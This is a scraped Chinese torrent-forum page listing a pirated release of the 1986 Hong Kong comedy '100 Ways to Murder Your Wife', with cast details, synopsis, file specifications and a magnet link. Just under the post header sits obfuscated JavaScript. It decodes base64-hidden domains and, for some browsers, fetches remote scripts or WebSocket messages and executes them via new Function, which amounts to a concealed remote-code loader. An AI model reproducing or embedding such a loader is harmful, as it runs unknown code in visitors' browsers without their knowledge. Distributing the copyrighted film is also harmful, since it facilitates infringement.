杀妻2人组[国语音轨/中文字幕]100.Ways.To.Murder.Your.Wife.1986.1080p.WEB-DL.H265.AAC-xiaopie-迅雷下载 3.10GB

版主小s 2月前 489

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 杀妻2人组 / 100 Ways to Murder Your Wife / 小丈夫 / 杀妻二人组

◎片 名 殺妻2人組

◎年 代 1986

◎产 地 中国香港

◎类 别 喜剧

◎语 言 粤语

◎上映日期 1986-06-05(中国香港)

◎IMDb评分 5.8/10 from 179 users

◎IMDb链接 https://www.imdb.com/title/tt0091935

◎豆瓣评分 6.5/10 from 5744 users

◎豆瓣链接 https://movie.douban.com/subject/1305343/

◎片 长 92分钟

◎导 演 钟镇涛 Kenny Bee

◎编 剧 罗启锐 Alex Law

◎主 演 周润发 Yun-Fat Chow

钟镇涛 Kenny Bee

梅艳芳 Anita Mui

王祖贤 Joey Wong

王晶 Jing Wong

陈友 Anthony Chan

成奎安 Fui-On Shing

午马 Wu Ma

林珊珊 Sandy Lamb

吴康宁 Hong-Ning Ng

◎标 签 周润发 | 香港 | 喜剧 | 王祖贤 | 香港电影 | 梅艳芳 | 钟镇涛 | 1986

◎简 介

阿B(钟镇涛饰)、阿发(周润发饰)都是足球好手。阿发来自大马,有个美丽风流的太太(王祖贤饰),常与男生调笑,令阿发又妒忌又焦虑。阿B的太太(梅艳芳饰)则是个脾气暴燥的女人,她时常埋怨阿B没有出息,而且还常常当众奚落他,使阿B面子尽失,自尊心受到伤害。一次阿B受可太太的气,到酒吧饮闷酒,遇到由大马来港的阿发,阿发也是不满太太对其他的男人太热情,还怀疑她红杏出墙。阿B、阿发互吐心事后,更觉同病相怜,大家酒醉后竟然发起杀妻之念,二人更密谋出不同的杀妻方法,其中尽情地发挥了小气男人的妒忌妻子的梦幻式惩治杀妻方法,可谓洋洋大观,笑话连篇。二人兴头一起,于是达成口头协议,二人各去对方家里杀掉对方的妻子......

  1. General

  2. Unique ID : 59285812797288452984896691077037123138 (0x2C9A083F3355308F2D9F327982EF6642)

  3. Complete name : [email protected]CHDWEB.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 3.10 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate : 4 636 kb/s

  9. Encoded date : UTC 2021-07-08 05:51:44

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@High

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 35 min

  19. Bit rate : 4 508 kb/s

  20. Width : 1 920 pixels

  21. Height : 1 024 pixels

  22. Display aspect ratio : 1.85:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.096

  29. Stream size : 3.01 GiB (97%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : AAC LC

  35. Format/Info : Advanced Audio Codec Low Complexity

  36. Codec ID : A_AAC-2

  37. Duration : 1 h 35 min

  38. Bit rate : 125 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Delay relative to video : -125 ms

  45. Stream size : 85.5 MiB (3%)

  46. Language : Chinese

  47. Default : Yes

  48. Forced : No


  49. Text #1

  50. ID : 3

  51. Format : UTF-8

  52. Codec ID : S_TEXT/UTF8

  53. Codec ID/Info : UTF-8 Plain Text

  54. Duration : 1 h 34 min

  55. Bit rate : 67 b/s

  56. Count of elements : 1765

  57. Stream size : 46.6 KiB (0%)

  58. Title : Chinese Simplified

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Text #2

  63. ID : 4

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 1 h 34 min

  68. Bit rate : 67 b/s

  69. Count of elements : 1765

  70. Stream size : 46.6 KiB (0%)

  71. Title : Chinese Traditional

  72. Language : Chinese

  73. Default : No

  74. Forced : No


  75. Text #3

  76. ID : 5

  77. Format : UTF-8

  78. Codec ID : S_TEXT/UTF8

  79. Codec ID/Info : UTF-8 Plain Text

  80. Duration : 1 h 34 min

  81. Bit rate : 54 b/s

  82. Count of elements : 1765

  83. Stream size : 37.5 KiB (0%)

  84. Title : English

  85. Language : English

  86. Default : No

  87. Forced : No




TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:DF8CC89DB11238CCB6F53005A7C53C4B74BB0723
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回